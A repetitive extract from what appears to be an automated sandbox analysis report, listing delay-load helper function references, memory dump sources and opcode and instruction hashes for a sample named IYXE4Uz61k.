• ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 2f85d9ef67a6587bcbdf3992dfc07485d38d5fc636173e39b982d1d29aa016bb
• Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
• Opcode Fuzzy Hash: 2f85d9ef67a6587bcbdf3992dfc07485d38d5fc636173e39b982d1d29aa016bb
• Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 719eb7389c6823afe2f9c06d9681b61760290d68eae96e0100e369ab7803f284
• Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
• Opcode Fuzzy Hash: 719eb7389c6823afe2f9c06d9681b61760290d68eae96e0100e369ab7803f284
• Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 050201495174ce215b233a8b4025b50ffc919b0951211fe5abfc29853f2be69f
                                                                                                                                                                                                    • Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 050201495174ce215b233a8b4025b50ffc919b0951211fe5abfc29853f2be69f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 02501a8c6f3ae5fabfa14f32ab633e50fb60dd39619e48208cadfb10c09c7ce1
                                                                                                                                                                                                    • Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02501a8c6f3ae5fabfa14f32ab633e50fb60dd39619e48208cadfb10c09c7ce1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 5ade8af58ba95c611984f791d86dcfc08e10b232eb3eb6f805f028037435cdef
                                                                                                                                                                                                    • Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ade8af58ba95c611984f791d86dcfc08e10b232eb3eb6f805f028037435cdef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 8edef5437e658d082adc9488a92b00a819cff75467d93bb395642e8190a358ee
                                                                                                                                                                                                    • Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8edef5437e658d082adc9488a92b00a819cff75467d93bb395642e8190a358ee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 53bb64b023533d88ec28920a36b70c2c3137070123e14617d9bca5909be8513d
• Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
• Opcode Fuzzy Hash: 53bb64b023533d88ec28920a36b70c2c3137070123e14617d9bca5909be8513d
• Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: ce5c3d703b6c206d910662b496d8cb396206a4878f12153f6c8acc630237f68f
• Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
• Opcode Fuzzy Hash: ce5c3d703b6c206d910662b496d8cb396206a4878f12153f6c8acc630237f68f
• Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 60e30e4c1887c6626d7bf6d74a9d3323d68e56734a76455f01ff0fc79aa97a2d
• Instruction ID: 6b906a6a7b5ce59e056548a5c3d07e3c03ecf873a663737df21804aa00fe26e7
• Opcode Fuzzy Hash: 60e30e4c1887c6626d7bf6d74a9d3323d68e56734a76455f01ff0fc79aa97a2d
• Instruction Fuzzy Hash: E3A001EA7A914ABC310876566D0BC3B121DF4C6B66330893EF866C4982A89468451A72
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 09dd4139bb74784a68279acf46b37db75b3241ae63a4588e0fac61de44e67df3
• Instruction ID: 3fb41b0085fab4451b8e1f0fc12078393d4eec6480d8368392062f477bd3cc88
• Opcode Fuzzy Hash: 09dd4139bb74784a68279acf46b37db75b3241ae63a4588e0fac61de44e67df3
• Instruction Fuzzy Hash: CDA001E62A915A7D7108B6556D06C3B021DE9D2B29330952EF825E5A81AC891C451A73
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 0fa6125884c0bd5bbccb90ddc7f839720ea39fc7adb51249dadad5ddec01760b
• Instruction ID: 6bfce62b643e8093a710bcb31d88eb5d3af8c821d81e0031e606f2ebb5bd198a
• Opcode Fuzzy Hash: 0fa6125884c0bd5bbccb90ddc7f839720ea39fc7adb51249dadad5ddec01760b
• Instruction Fuzzy Hash: 49A011E22A800ABC3008B2002C02C3B020CE8C2B20330882EF822E0A80A8880C000A33
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 893db725910fb0be2bcdbc9b83207e2ea666f063e881980bd05261169eedad30
• Instruction ID: 6bfce62b643e8093a710bcb31d88eb5d3af8c821d81e0031e606f2ebb5bd198a
• Opcode Fuzzy Hash: 893db725910fb0be2bcdbc9b83207e2ea666f063e881980bd05261169eedad30
• Instruction Fuzzy Hash: 49A011E22A800ABC3008B2002C02C3B020CE8C2B20330882EF822E0A80A8880C000A33
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 51b2896d3e804d060ce2318e32d3edda4d9db8c7447cac89fe574d3b31e9dca2
                                                                                                                                                                                                    • Instruction ID: 6bfce62b643e8093a710bcb31d88eb5d3af8c821d81e0031e606f2ebb5bd198a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51b2896d3e804d060ce2318e32d3edda4d9db8c7447cac89fe574d3b31e9dca2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49A011E22A800ABC3008B2002C02C3B020CE8C2B20330882EF822E0A80A8880C000A33
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: b4cf7612271a4f5cd374137741ef7402329df51aca41f11ba0671b6313fa8b4e
                                                                                                                                                                                                    • Instruction ID: 6bfce62b643e8093a710bcb31d88eb5d3af8c821d81e0031e606f2ebb5bd198a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4cf7612271a4f5cd374137741ef7402329df51aca41f11ba0671b6313fa8b4e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49A011E22A800ABC3008B2002C02C3B020CE8C2B20330882EF822E0A80A8880C000A33
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 816649ab4dae69b40978cc0590ec822a50e6714e964659f872c3a17ad406b299
                                                                                                                                                                                                    • Instruction ID: 6bfce62b643e8093a710bcb31d88eb5d3af8c821d81e0031e606f2ebb5bd198a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 816649ab4dae69b40978cc0590ec822a50e6714e964659f872c3a17ad406b299
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49A011E22A800ABC3008B2002C02C3B020CE8C2B20330882EF822E0A80A8880C000A33
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E580
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
